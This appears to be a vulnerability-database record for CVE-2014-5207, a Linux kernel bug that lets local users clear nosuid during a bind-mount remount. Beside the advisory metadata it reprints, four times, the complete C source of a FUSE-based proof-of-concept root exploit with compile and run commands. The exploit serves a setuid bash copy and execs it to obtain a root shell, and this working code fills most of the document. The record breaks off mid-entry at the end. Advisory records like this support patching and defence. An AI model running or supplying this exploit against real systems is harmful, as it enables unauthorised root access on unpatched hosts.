ID: CVE-2014-5207
Type: cve
Reporter: cve@mitre.org
Modified: 2020-08-14T18:14:00
Description
fs/namespace.c in the Linux kernel through 3.16.1 does not properly restrict clearing MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and changing MNT_ATIME_MASK during a remount of a bind mount. Via a "mount -o remount" command within a user namespace, this allows local users to gain privileges, interfere with backups and auditing on systems that had atime enabled, or cause a denial of service (excessive filesystem updating) on systems that had atime disabled.
{"id": "CVE-2014-5207", "bulletinFamily": "NVD", "title": "CVE-2014-5207", "description": "fs/namespace.c in the Linux kernel through 3.16.1 does not properly restrict clearing MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and changing MNT_ATIME_MASK during a remount of a bind mount, which allows local users to gain privileges, interfere with backups and auditing on systems that had atime enabled, or cause a denial of service (excessive filesystem updating) on systems that had atime disabled via a \"mount -o remount\" command within a user namespace.", "published": "2014-08-18T11:15:00", "modified": "2020-08-14T18:14:00", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5207", "reporter": "cve@mitre.org", "references": ["http://osvdb.org/show/osvdb/110055", "http://www.securityfocus.com/bid/69216", "http://packetstormsecurity.com/files/128595/Linux-Kernel-3.16.1-FUSE-Privilege-Escalation.html", "https://bugzilla.redhat.com/show_bug.cgi?id=1129662", "https://github.com/torvalds/linux/commit/9566d6742852c527bf5af38af5cbb878dad75705", "http://www.ubuntu.com/usn/USN-2317-1", "http://seclists.org/oss-sec/2014/q3/352", "https://exchange.xforce.ibmcloud.com/vulnerabilities/95266", "http://www.exploit-db.com/exploits/34923", "http://www.openwall.com/lists/oss-security/2014/08/13/4", "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=9566d6742852c527bf5af38af5cbb878dad75705", "http://www.ubuntu.com/usn/USN-2318-1"], "cvelist": ["CVE-2014-5207"], "type": "cve", "lastseen": "2020-12-09T19:58:25", "edition": 6, "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:34923"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:128595"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:F8053CF56EBE8E6A9E4404FBAF8824B6"]}, {"type": "seebug", "idList": ["SSV:87322"]}, {"type": "zdt", "idList": ["1337DAY-ID-22736"]}, {"type": "openvas", 
"idList": ["OPENVAS:1361412562310850628", "OPENVAS:1361412562311220191478", "OPENVAS:1361412562310841934", "OPENVAS:1361412562310868102", "OPENVAS:1361412562310841935", "OPENVAS:1361412562311220192599", "OPENVAS:1361412562310868101", "OPENVAS:1361412562311220201674", "OPENVAS:1361412562310120086"]}, {"type": "ubuntu", "idList": ["USN-2318-1", "USN-2317-1"]}, {"type": "amazon", "idList": ["ALAS-2014-417"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13914", "SECURITYVULNS:DOC:31007"]}, {"type": "nessus", "idList": ["EULEROS_SA-2019-2599.NASL", "UBUNTU_USN-2318-1.NASL", "FEDORA_2014-9449.NASL", "ALA_ALAS-2014-417.NASL", "OPENSUSE-2014-793.NASL", "FEDORA_2014-9466.NASL", "EULEROS_SA-2019-1478.NASL", "UBUNTU_USN-2317-1.NASL", "EULEROS_SA-2020-1674.NASL"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2014:1677-1"]}, {"type": "fedora", "idList": ["FEDORA:2BA602158D", "FEDORA:1835E22100"]}, {"type": "lenovo", "idList": ["LENOVO:PS500321-AMI-MEGARAC-SP-X-BMC-VULNERABILITIES-NOSID", "LENOVO:PS500321-NOSID"]}], "modified": "2020-12-09T19:58:25", "rev": 2}, "score": {"value": 6.6, "vector": "NONE", "modified": "2020-12-09T19:58:25", "rev": 2}, "vulnersScore": 6.6}, "cpe": ["cpe:/o:linux:linux_kernel:3.16.1", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:14.04"], "affectedSoftware": [{"cpeName": "canonical:ubuntu_linux", "name": "canonical ubuntu linux", "operator": "eq", "version": "14.04"}, {"cpeName": "linux:linux_kernel", "name": "linux linux kernel", "operator": "le", "version": "3.16.1"}, {"cpeName": "canonical:ubuntu_linux", "name": "canonical ubuntu linux", "operator": "eq", "version": "12.04"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "HIGH", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 6.2, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:L/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 1.9, 
"impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.16.1:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*"], "cwe": ["CWE-269"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:linux:linux_kernel:3.16.1:*:*:*:*:*:*:*", "versionEndIncluding": "3.16.1", "vulnerable": true}], "operator": "OR"}]}}
{"exploitdb": [{"lastseen": "2016-02-04T00:13:21", "description": "Linux Kernel 3.16.1 - Remount FUSE Exploit. CVE-2014-5207. Local exploit for linux platform", "published": "2014-10-09T00:00:00", "type": "exploitdb", "title": "Linux Kernel 3.16.1 - Remount FUSE Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-5207"], "modified": "2014-10-09T00:00:00", "id": "EDB-ID:34923", "href": "https://www.exploit-db.com/exploits/34923/", "sourceData": "/*\r\n FUSE-based exploit for CVE-2014-5207\r\n Copyright (c) 2014 Andy Lutomirski\r\n\r\n Based on code that is:\r\n Copyright (C) 2001-2007 Miklos Szeredi <miklos@szeredi.hu>\r\n\r\n This program can be distributed under the terms of the GNU GPL.\r\n See the file COPYING.\r\n\r\n gcc -Wall fuse_suid.c `pkg-config fuse --cflags --libs` -o fuse_suid\r\n mkdir test\r\n ./fuse_suid test\r\n\r\n This isn't a work of art: it doesn't clean up after itself very well.\r\n*/\r\n\r\n#define _GNU_SOURCE\r\n#define FUSE_USE_VERSION 26\r\n\r\n#include <fuse.h>\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <errno.h>\r\n#include <fcntl.h>\r\n#include <err.h>\r\n#include <sched.h>\r\n#include <stdlib.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n#include <sys/mount.h>\r\n#include <unistd.h>\r\n\r\nstatic const char *sh_path = \"/sh\";\r\nstatic int sh_fd;\r\nstatic loff_t sh_size;\r\n\r\nstatic int hello_getattr(const char *path, struct stat *stbuf)\r\n{\r\n int res = 0;\r\n\r\n memset(stbuf, 0, sizeof(struct stat));\r\n if (strcmp(path, \"/\") == 0) {\r\n stbuf->st_mode = S_IFDIR | 0755;\r\n stbuf->st_nlink = 2;\r\n } else if (strcmp(path, sh_path) == 0) {\r\n stbuf->st_mode = S_IFREG | 04755;\r\n stbuf->st_nlink = 1;\r\n stbuf->st_size = sh_size;\r\n } else\r\n res = -ENOENT;\r\n\r\n return res;\r\n}\r\n\r\nstatic int hello_readdir(const char *path, void *buf, fuse_fill_dir_t filler,\r\n off_t offset, struct fuse_file_info *fi)\r\n{\r\n (void) offset;\r\n (void) fi;\r\n\r\n if (strcmp(path, \"/\") != 0)\r\n 
return -ENOENT;\r\n\r\n filler(buf, \".\", NULL, 0);\r\n filler(buf, \"..\", NULL, 0);\r\n filler(buf, sh_path + 1, NULL, 0);\r\n\r\n return 0;\r\n}\r\n\r\nstatic int hello_open(const char *path, struct fuse_file_info *fi)\r\n{\r\n if (strcmp(path, sh_path) != 0)\r\n return -ENOENT;\r\n\r\n if ((fi->flags & 3) != O_RDONLY)\r\n return -EACCES;\r\n\r\n return 0;\r\n}\r\n\r\nstatic int hello_read(const char *path, char *buf, size_t size, off_t offset,\r\n struct fuse_file_info *fi)\r\n{\r\n (void) fi;\r\n if (strcmp(path, sh_path) != 0)\r\n return -ENOENT;\r\n\r\n return pread(sh_fd, buf, size, offset);\r\n}\r\n\r\nstatic struct fuse_operations hello_oper = {\r\n .getattr = hello_getattr,\r\n .readdir = hello_readdir,\r\n .open = hello_open,\r\n .read = hello_read,\r\n};\r\n\r\nstatic int evilfd = -1;\r\n\r\nstatic int child2(void *mnt_void)\r\n{\r\n const char *mountpoint = mnt_void;\r\n int fd2;\r\n\r\n if (unshare(CLONE_NEWUSER | CLONE_NEWNS) != 0)\r\n err(1, \"unshare\");\r\n\r\n if (mount(mountpoint, mountpoint, NULL, MS_REMOUNT | MS_BIND, NULL) < 0)\r\n err(1, \"mount\");\r\n\r\n fd2 = open(mountpoint, O_RDONLY | O_DIRECTORY);\r\n if (fd2 == -1)\r\n err(1, \"open\");\r\n\r\n if (dup3(fd2, evilfd, O_CLOEXEC) == -1)\r\n err(1, \"dup3\");\r\n close(fd2);\r\n\r\n printf(\"Mount hackery seems to have worked.\\n\");\r\n\r\n exit(0);\r\n}\r\n\r\nstatic int child1(const char *mountpoint)\r\n{\r\n char child2stack[2048];\r\n char evil_path[1024];\r\n\r\n evilfd = dup(0);\r\n if (evilfd == -1)\r\n err(1, \"dup\");\r\n\r\n if (clone(child2, child2stack,\r\n CLONE_FILES | CLONE_VFORK,\r\n (void *)mountpoint) == -1)\r\n err(1, \"clone\");\r\n\r\n printf(\"Here goes...\\n\");\r\n\r\n sprintf(evil_path, \"/proc/self/fd/%d/sh\", evilfd);\r\n execl(evil_path, \"sh\", \"-p\", NULL);\r\n perror(evil_path);\r\n return 1;\r\n}\r\n\r\nstatic int fuse_main_suid(int argc, char *argv[],\r\n const struct fuse_operations *op,\r\n void *user_data)\r\n{\r\n struct fuse *fuse;\r\n char 
*mountpoint;\r\n int multithreaded;\r\n int res;\r\n\r\n if (argc != 2) {\r\n printf(\"Usage: fuse_suid <mountpoint>\\n\");\r\n return -EINVAL;\r\n }\r\n\r\n char *args[] = {\"fuse_suid\", \"-f\", \"--\", argv[1], NULL};\r\n\r\n fuse = fuse_setup(sizeof(args)/sizeof(args[0]) - 1, args,\r\n op, sizeof(*op), &mountpoint,\r\n &multithreaded, user_data);\r\n if (fuse == NULL)\r\n return 1;\r\n\r\n printf(\"FUSE initialized. Time to have some fun...\\n\");\r\n printf(\"Warning: this exploit hangs on exit. Hit Ctrl-C when done.\\n\");\r\n if (fork() == 0)\r\n _exit(child1(mountpoint));\r\n\r\n if (multithreaded)\r\n res = fuse_loop_mt(fuse);\r\n else\r\n res = fuse_loop(fuse);\r\n\r\n fuse_teardown(fuse, mountpoint);\r\n if (res == -1)\r\n return 1;\r\n\r\n return 0;\r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n sh_fd = open(\"/bin/bash\", O_RDONLY);\r\n if (sh_fd == -1)\r\n err(1, \"sh\");\r\n sh_size = lseek(sh_fd, 0, SEEK_END);\r\n return fuse_main_suid(argc, argv, &hello_oper, NULL);\r\n}", "cvss": {"score": 6.0, "vector": "AV:LOCAL/AC:HIGH/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/34923/"}], "packetstorm": [{"lastseen": "2016-12-05T22:16:25", "description": "", "published": "2014-10-08T00:00:00", "type": "packetstorm", "title": "Linux Kernel 3.16.1 FUSE Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-5207"], "modified": "2014-10-08T00:00:00", "id": "PACKETSTORM:128595", "href": "https://packetstormsecurity.com/files/128595/Linux-Kernel-3.16.1-FUSE-Privilege-Escalation.html", "sourceData": "`I've been sitting on this for too long. CVE-2014-5207 was an \ninteresting bug found by Kenton Varda and Eric Biederman. Here's a \nsomewhat ugly PoC root exploit. You'll need the ability to use FUSE, \nalthough variants would work with removable media or network file \nsystems, too. 
\n \n--Andy \n \n/* \nFUSE-based exploit for CVE-2014-5207 \nCopyright (c) 2014 Andy Lutomirski \n \nBased on code that is: \nCopyright (C) 2001-2007 Miklos Szeredi <miklos@szeredi.hu> \n \nThis program can be distributed under the terms of the GNU GPL. \nSee the file COPYING. \n \ngcc -Wall fuse_suid.c `pkg-config fuse --cflags --libs` -o fuse_suid \nmkdir test \n./fuse_suid test \n \nThis isn't a work of art: it doesn't clean up after itself very well. \n*/ \n \n#define _GNU_SOURCE \n#define FUSE_USE_VERSION 26 \n \n#include <fuse.h> \n#include <stdio.h> \n#include <string.h> \n#include <errno.h> \n#include <fcntl.h> \n#include <err.h> \n#include <sched.h> \n#include <stdlib.h> \n#include <sys/types.h> \n#include <sys/wait.h> \n#include <sys/mount.h> \n#include <unistd.h> \n \nstatic const char *sh_path = \"/sh\"; \nstatic int sh_fd; \nstatic loff_t sh_size; \n \nstatic int hello_getattr(const char *path, struct stat *stbuf) \n{ \nint res = 0; \n \nmemset(stbuf, 0, sizeof(struct stat)); \nif (strcmp(path, \"/\") == 0) { \nstbuf->st_mode = S_IFDIR | 0755; \nstbuf->st_nlink = 2; \n} else if (strcmp(path, sh_path) == 0) { \nstbuf->st_mode = S_IFREG | 04755; \nstbuf->st_nlink = 1; \nstbuf->st_size = sh_size; \n} else \nres = -ENOENT; \n \nreturn res; \n} \n \nstatic int hello_readdir(const char *path, void *buf, fuse_fill_dir_t filler, \noff_t offset, struct fuse_file_info *fi) \n{ \n(void) offset; \n(void) fi; \n \nif (strcmp(path, \"/\") != 0) \nreturn -ENOENT; \n \nfiller(buf, \".\", NULL, 0); \nfiller(buf, \"..\", NULL, 0); \nfiller(buf, sh_path + 1, NULL, 0); \n \nreturn 0; \n} \n \nstatic int hello_open(const char *path, struct fuse_file_info *fi) \n{ \nif (strcmp(path, sh_path) != 0) \nreturn -ENOENT; \n \nif ((fi->flags & 3) != O_RDONLY) \nreturn -EACCES; \n \nreturn 0; \n} \n \nstatic int hello_read(const char *path, char *buf, size_t size, off_t offset, \nstruct fuse_file_info *fi) \n{ \n(void) fi; \nif (strcmp(path, sh_path) != 0) \nreturn -ENOENT; \n 
\nreturn pread(sh_fd, buf, size, offset); \n} \n \nstatic struct fuse_operations hello_oper = { \n.getattr = hello_getattr, \n.readdir = hello_readdir, \n.open = hello_open, \n.read = hello_read, \n}; \n \nstatic int evilfd = -1; \n \nstatic int child2(void *mnt_void) \n{ \nconst char *mountpoint = mnt_void; \nint fd2; \n \nif (unshare(CLONE_NEWUSER | CLONE_NEWNS) != 0) \nerr(1, \"unshare\"); \n \nif (mount(mountpoint, mountpoint, NULL, MS_REMOUNT | MS_BIND, NULL) < 0) \nerr(1, \"mount\"); \n \nfd2 = open(mountpoint, O_RDONLY | O_DIRECTORY); \nif (fd2 == -1) \nerr(1, \"open\"); \n \nif (dup3(fd2, evilfd, O_CLOEXEC) == -1) \nerr(1, \"dup3\"); \nclose(fd2); \n \nprintf(\"Mount hackery seems to have worked.\\n\"); \n \nexit(0); \n} \n \nstatic int child1(const char *mountpoint) \n{ \nchar child2stack[2048]; \nchar evil_path[1024]; \n \nevilfd = dup(0); \nif (evilfd == -1) \nerr(1, \"dup\"); \n \nif (clone(child2, child2stack, \nCLONE_FILES | CLONE_VFORK, \n(void *)mountpoint) == -1) \nerr(1, \"clone\"); \n \nprintf(\"Here goes...\\n\"); \n \nsprintf(evil_path, \"/proc/self/fd/%d/sh\", evilfd); \nexecl(evil_path, \"sh\", \"-p\", NULL); \nperror(evil_path); \nreturn 1; \n} \n \nstatic int fuse_main_suid(int argc, char *argv[], \nconst struct fuse_operations *op, \nvoid *user_data) \n{ \nstruct fuse *fuse; \nchar *mountpoint; \nint multithreaded; \nint res; \n \nif (argc != 2) { \nprintf(\"Usage: fuse_suid <mountpoint>\\n\"); \nreturn -EINVAL; \n} \n \nchar *args[] = {\"fuse_suid\", \"-f\", \"--\", argv[1], NULL}; \n \nfuse = fuse_setup(sizeof(args)/sizeof(args[0]) - 1, args, \nop, sizeof(*op), &mountpoint, \n&multithreaded, user_data); \nif (fuse == NULL) \nreturn 1; \n \nprintf(\"FUSE initialized. Time to have some fun...\\n\"); \nprintf(\"Warning: this exploit hangs on exit. 
Hit Ctrl-C when done.\\n\"); \nif (fork() == 0) \n_exit(child1(mountpoint)); \n \nif (multithreaded) \nres = fuse_loop_mt(fuse); \nelse \nres = fuse_loop(fuse); \n \nfuse_teardown(fuse, mountpoint); \nif (res == -1) \nreturn 1; \n \nreturn 0; \n} \n \nint main(int argc, char *argv[]) \n{ \nsh_fd = open(\"/bin/bash\", O_RDONLY); \nif (sh_fd == -1) \nerr(1, \"sh\"); \nsh_size = lseek(sh_fd, 0, SEEK_END); \nreturn fuse_main_suid(argc, argv, &hello_oper, NULL); \n} \n \n \n`\n", "cvss": {"score": 6.0, "vector": "AV:LOCAL/AC:HIGH/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128595/fuse-escalate.txt"}], "seebug": [{"lastseen": "2017-11-19T13:11:52", "description": "No description provided by source.", "published": "2014-10-10T00:00:00", "type": "seebug", "title": "Linux Kernel remount FUSE Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-5207"], "modified": "2014-10-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87322", "id": "SSV:87322", "sourceData": "\n /*\r\n FUSE-based exploit for CVE-2014-5207\r\n Copyright (c) 2014 Andy Lutomirski\r\n \r\n Based on code that is:\r\n Copyright (C) 2001-2007 Miklos Szeredi <miklos@szeredi.hu>\r\n \r\n This program can be distributed under the terms of the GNU GPL.\r\n See the file COPYING.\r\n \r\n gcc -Wall fuse_suid.c `pkg-config fuse --cflags --libs` -o fuse_suid\r\n mkdir test\r\n ./fuse_suid test\r\n \r\n This isn't a work of art: it doesn't clean up after itself very well.\r\n*/\r\n \r\n#define _GNU_SOURCE\r\n#define FUSE_USE_VERSION 26\r\n \r\n#include <fuse.h>\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <errno.h>\r\n#include <fcntl.h>\r\n#include <err.h>\r\n#include <sched.h>\r\n#include <stdlib.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n#include <sys/mount.h>\r\n#include <unistd.h>\r\n \r\nstatic const char *sh_path = "/sh";\r\nstatic int sh_fd;\r\nstatic loff_t sh_size;\r\n \r\nstatic int 
hello_getattr(const char *path, struct stat *stbuf)\r\n{\r\n int res = 0;\r\n \r\n memset(stbuf, 0, sizeof(struct stat));\r\n if (strcmp(path, "/") == 0) {\r\n stbuf->st_mode = S_IFDIR | 0755;\r\n stbuf->st_nlink = 2;\r\n } else if (strcmp(path, sh_path) == 0) {\r\n stbuf->st_mode = S_IFREG | 04755;\r\n stbuf->st_nlink = 1;\r\n stbuf->st_size = sh_size;\r\n } else\r\n res = -ENOENT;\r\n \r\n return res;\r\n}\r\n \r\nstatic int hello_readdir(const char *path, void *buf, fuse_fill_dir_t filler,\r\n off_t offset, struct fuse_file_info *fi)\r\n{\r\n (void) offset;\r\n (void) fi;\r\n \r\n if (strcmp(path, "/") != 0)\r\n return -ENOENT;\r\n \r\n filler(buf, ".", NULL, 0);\r\n filler(buf, "..", NULL, 0);\r\n filler(buf, sh_path + 1, NULL, 0);\r\n \r\n return 0;\r\n}\r\n \r\nstatic int hello_open(const char *path, struct fuse_file_info *fi)\r\n{\r\n if (strcmp(path, sh_path) != 0)\r\n return -ENOENT;\r\n \r\n if ((fi->flags & 3) != O_RDONLY)\r\n return -EACCES;\r\n \r\n return 0;\r\n}\r\n \r\nstatic int hello_read(const char *path, char *buf, size_t size, off_t offset,\r\n struct fuse_file_info *fi)\r\n{\r\n (void) fi;\r\n if (strcmp(path, sh_path) != 0)\r\n return -ENOENT;\r\n \r\n return pread(sh_fd, buf, size, offset);\r\n}\r\n \r\nstatic struct fuse_operations hello_oper = {\r\n .getattr = hello_getattr,\r\n .readdir = hello_readdir,\r\n .open = hello_open,\r\n .read = hello_read,\r\n};\r\n \r\nstatic int evilfd = -1;\r\n \r\nstatic int child2(void *mnt_void)\r\n{\r\n const char *mountpoint = mnt_void;\r\n int fd2;\r\n \r\n if (unshare(CLONE_NEWUSER | CLONE_NEWNS) != 0)\r\n err(1, "unshare");\r\n \r\n if (mount(mountpoint, mountpoint, NULL, MS_REMOUNT | MS_BIND, NULL) < 0)\r\n err(1, "mount");\r\n \r\n fd2 = open(mountpoint, O_RDONLY | O_DIRECTORY);\r\n if (fd2 == -1)\r\n err(1, "open");\r\n \r\n if (dup3(fd2, evilfd, O_CLOEXEC) == -1)\r\n err(1, "dup3");\r\n close(fd2);\r\n \r\n printf("Mount hackery seems to have worked.\\n");\r\n \r\n exit(0);\r\n}\r\n \r\nstatic 
int child1(const char *mountpoint)\r\n{\r\n char child2stack[2048];\r\n char evil_path[1024];\r\n \r\n evilfd = dup(0);\r\n if (evilfd == -1)\r\n err(1, "dup");\r\n \r\n if (clone(child2, child2stack,\r\n CLONE_FILES | CLONE_VFORK,\r\n (void *)mountpoint) == -1)\r\n err(1, "clone");\r\n \r\n printf("Here goes...\\n");\r\n \r\n sprintf(evil_path, "/proc/self/fd/%d/sh", evilfd);\r\n execl(evil_path, "sh", "-p", NULL);\r\n perror(evil_path);\r\n return 1;\r\n}\r\n \r\nstatic int fuse_main_suid(int argc, char *argv[],\r\n const struct fuse_operations *op,\r\n void *user_data)\r\n{\r\n struct fuse *fuse;\r\n char *mountpoint;\r\n int multithreaded;\r\n int res;\r\n \r\n if (argc != 2) {\r\n printf("Usage: fuse_suid <mountpoint>\\n");\r\n return -EINVAL;\r\n }\r\n \r\n char *args[] = {"fuse_suid", "-f", "--", argv[1], NULL};\r\n \r\n fuse = fuse_setup(sizeof(args)/sizeof(args[0]) - 1, args,\r\n op, sizeof(*op), &mountpoint,\r\n &multithreaded, user_data);\r\n if (fuse == NULL)\r\n return 1;\r\n \r\n printf("FUSE initialized. Time to have some fun...\\n");\r\n printf("Warning: this exploit hangs on exit. 
Hit Ctrl-C when done.\\n");\r\n if (fork() == 0)\r\n _exit(child1(mountpoint));\r\n \r\n if (multithreaded)\r\n res = fuse_loop_mt(fuse);\r\n else\r\n res = fuse_loop(fuse);\r\n \r\n fuse_teardown(fuse, mountpoint);\r\n if (res == -1)\r\n return 1;\r\n \r\n return 0;\r\n}\r\n \r\nint main(int argc, char *argv[])\r\n{\r\n sh_fd = open("/bin/bash", O_RDONLY);\r\n if (sh_fd == -1)\r\n err(1, "sh");\r\n sh_size = lseek(sh_fd, 0, SEEK_END);\r\n return fuse_main_suid(argc, argv, &hello_oper, NULL);\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-87322", "cvss": {"score": 6.0, "vector": "AV:LOCAL/AC:HIGH/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:26", "description": "\nLinux Kernel 3.16.1 - Remount FUSE Local Privilege Escalation", "edition": 1, "published": "2014-10-09T00:00:00", "title": "Linux Kernel 3.16.1 - Remount FUSE Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-5207"], "modified": "2014-10-09T00:00:00", "id": "EXPLOITPACK:F8053CF56EBE8E6A9E4404FBAF8824B6", "href": "", "sourceData": "/*\n FUSE-based exploit for CVE-2014-5207\n Copyright (c) 2014 Andy Lutomirski\n\n Based on code that is:\n Copyright (C) 2001-2007 Miklos Szeredi <miklos@szeredi.hu>\n\n This program can be distributed under the terms of the GNU GPL.\n See the file COPYING.\n\n gcc -Wall fuse_suid.c `pkg-config fuse --cflags --libs` -o fuse_suid\n mkdir test\n ./fuse_suid test\n\n This isn't a work of art: it doesn't clean up after itself very well.\n*/\n\n#define _GNU_SOURCE\n#define FUSE_USE_VERSION 26\n\n#include <fuse.h>\n#include <stdio.h>\n#include <string.h>\n#include <errno.h>\n#include <fcntl.h>\n#include <err.h>\n#include <sched.h>\n#include <stdlib.h>\n#include <sys/types.h>\n#include <sys/wait.h>\n#include <sys/mount.h>\n#include <unistd.h>\n\nstatic const char *sh_path = \"/sh\";\nstatic int sh_fd;\nstatic loff_t sh_size;\n\nstatic int hello_getattr(const 
char *path, struct stat *stbuf)\n{\n int res = 0;\n\n memset(stbuf, 0, sizeof(struct stat));\n if (strcmp(path, \"/\") == 0) {\n stbuf->st_mode = S_IFDIR | 0755;\n stbuf->st_nlink = 2;\n } else if (strcmp(path, sh_path) == 0) {\n stbuf->st_mode = S_IFREG | 04755;\n stbuf->st_nlink = 1;\n stbuf->st_size = sh_size;\n } else\n res = -ENOENT;\n\n return res;\n}\n\nstatic int hello_readdir(const char *path, void *buf, fuse_fill_dir_t filler,\n off_t offset, struct fuse_file_info *fi)\n{\n (void) offset;\n (void) fi;\n\n if (strcmp(path, \"/\") != 0)\n return -ENOENT;\n\n filler(buf, \".\", NULL, 0);\n filler(buf, \"..\", NULL, 0);\n filler(buf, sh_path + 1, NULL, 0);\n\n return 0;\n}\n\nstatic int hello_open(const char *path, struct fuse_file_info *fi)\n{\n if (strcmp(path, sh_path) != 0)\n return -ENOENT;\n\n if ((fi->flags & 3) != O_RDONLY)\n return -EACCES;\n\n return 0;\n}\n\nstatic int hello_read(const char *path, char *buf, size_t size, off_t offset,\n struct fuse_file_info *fi)\n{\n (void) fi;\n if (strcmp(path, sh_path) != 0)\n return -ENOENT;\n\n return pread(sh_fd, buf, size, offset);\n}\n\nstatic struct fuse_operations hello_oper = {\n .getattr = hello_getattr,\n .readdir = hello_readdir,\n .open = hello_open,\n .read = hello_read,\n};\n\nstatic int evilfd = -1;\n\nstatic int child2(void *mnt_void)\n{\n const char *mountpoint = mnt_void;\n int fd2;\n\n if (unshare(CLONE_NEWUSER | CLONE_NEWNS) != 0)\n err(1, \"unshare\");\n\n if (mount(mountpoint, mountpoint, NULL, MS_REMOUNT | MS_BIND, NULL) < 0)\n err(1, \"mount\");\n\n fd2 = open(mountpoint, O_RDONLY | O_DIRECTORY);\n if (fd2 == -1)\n err(1, \"open\");\n\n if (dup3(fd2, evilfd, O_CLOEXEC) == -1)\n err(1, \"dup3\");\n close(fd2);\n\n printf(\"Mount hackery seems to have worked.\\n\");\n\n exit(0);\n}\n\nstatic int child1(const char *mountpoint)\n{\n char child2stack[2048];\n char evil_path[1024];\n\n evilfd = dup(0);\n if (evilfd == -1)\n err(1, \"dup\");\n\n if (clone(child2, child2stack,\n CLONE_FILES | 
CLONE_VFORK,\n (void *)mountpoint) == -1)\n err(1, \"clone\");\n\n printf(\"Here goes...\\n\");\n\n sprintf(evil_path, \"/proc/self/fd/%d/sh\", evilfd);\n execl(evil_path, \"sh\", \"-p\", NULL);\n perror(evil_path);\n return 1;\n}\n\nstatic int fuse_main_suid(int argc, char *argv[],\n const struct fuse_operations *op,\n void *user_data)\n{\n struct fuse *fuse;\n char *mountpoint;\n int multithreaded;\n int res;\n\n if (argc != 2) {\n printf(\"Usage: fuse_suid <mountpoint>\\n\");\n return -EINVAL;\n }\n\n char *args[] = {\"fuse_suid\", \"-f\", \"--\", argv[1], NULL};\n\n fuse = fuse_setup(sizeof(args)/sizeof(args[0]) - 1, args,\n op, sizeof(*op), &mountpoint,\n &multithreaded, user_data);\n if (fuse == NULL)\n return 1;\n\n printf(\"FUSE initialized. Time to have some fun...\\n\");\n printf(\"Warning: this exploit hangs on exit. Hit Ctrl-C when done.\\n\");\n if (fork() == 0)\n _exit(child1(mountpoint));\n\n if (multithreaded)\n res = fuse_loop_mt(fuse);\n else\n res = fuse_loop(fuse);\n\n fuse_teardown(fuse, mountpoint);\n if (res == -1)\n return 1;\n\n return 0;\n}\n\nint main(int argc, char *argv[])\n{\n sh_fd = open(\"/bin/bash\", O_RDONLY);\n if (sh_fd == -1)\n err(1, \"sh\");\n sh_size = lseek(sh_fd, 0, SEEK_END);\n return fuse_main_suid(argc, argv, &hello_oper, NULL);\n}", "cvss": {"score": 6.0, "vector": "AV:L/AC:H/Au:S/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-01-03T17:04:19", "description": "FUSE-based exploit that leverages a flaw in fs/namespace.c where it does not properly restrict clearing MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and changing MNT_ATIME_MASK during a remount of a bind mount, which allows local users to gain privileges. 
